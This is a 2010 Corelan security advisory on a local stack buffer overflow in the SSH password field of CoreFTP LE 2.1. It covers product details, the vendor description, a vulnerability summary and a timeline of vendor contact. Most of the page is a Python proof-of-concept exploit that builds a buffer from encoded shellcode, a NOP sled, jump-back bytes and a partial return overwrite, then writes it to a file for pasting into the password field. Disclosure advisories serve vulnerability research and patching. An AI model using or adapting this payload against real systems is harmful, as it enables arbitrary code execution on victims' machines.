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CORELAN-10-007 – CoreFTP (password field) Stack Buffer Overflow

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February 2, 2010


mr_me

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Advisory        : CORELAN-10-007
Disclosure date : 2nd Feb 2010

0x00 : Vulnerability information
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[*] Product : Coreftp LE
[*] Version : 2.1
[*] Vendor : ServersMan
[*] URL : http://www.coreftp.com/
[*] Platform : Windows XP SP3
[*] Type of vulnerability : Local Stack buffer overflow
[*] Risk rating : Low
[*] Issue fixed in version : No
[*] Vulnerability discovered by : mr_me
[*] Greetings to : corelanc0d3r, EdiStrosar, jnz, rick2600, ekse, MarkoT, sinn3r & Jacky from Corelan Team

0x01 : Vendor description of software
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From the vendor website:

Now you can download Core FTP LE – free Windows software that includes the client FTP features you need.  Features like SFTP (SSH), SSL, TLS, IDN, browser

integration, site to site transfers, FTP transfer resume, drag and drop support, file viewing & editing, firewall support, custom commands, FTP URL parsing,

command line transfers, filters, and much, much more!

This free, secure FTP client gives you a fast, easy, reliable way to update and maintain your website via http://FTP.  It also provides a secure method (via SSL,

TLS, or SFTP) to upload / download files to and from FTP servers.  Check out the list of features and you'll find almost every feature you need, all in a

free ftp program.   There are no popup ads, advertising or spyware and you're never asked or reminded to register.

0x02 : Vulnerability details
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The vulnerability can be triggered by convincing a user to submit an overly long String for the SSH password. The buffer is unchecked,
resulting in control of the instruction pointer, allowing for arbitrary code injection.

0x03 : Vendor communication
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[*] January 17, 2010 – Initial disclosure to the vendor
[*] January 20, 2010 – Vendor reminded about vulnerability
[*] January 21, 2010 – Vendor replied and acknowledged the vulnerability
[*] January 21, 2010 – Requested patch date
[*] January 30, 2010 – reminded vendor of releasing a patch date
[*] February 2, 2010 – No contact or response from vendor
[*] February 2, 2010 – Public disclosure

0x04 : Exploit/PoC
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#!/usr/bin/python
#
#
#
print "[+] CoreFTP v2.1 b1637 (password field) Universal BOF exploit"

sc = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a");

print "[+] Creating buffer string in overflowpassword.txt."

stuff = "\x41" * 145
stuff += "\x90" * 5
stuff += sc
stuff += "\x41" * (1008-len(stuff)-5)
stuff += "\xe9\x7c\xfc\xff\xff"         # Lets fly
stuff += "\xeb\xf9\x90\x90"             # Jump back
stuff += "\x0b\x0b\x27\x00"             # partial/null overwrite

f1 = open('overflowpassword.txt','w');
f1.write(stuff);
f1.close();

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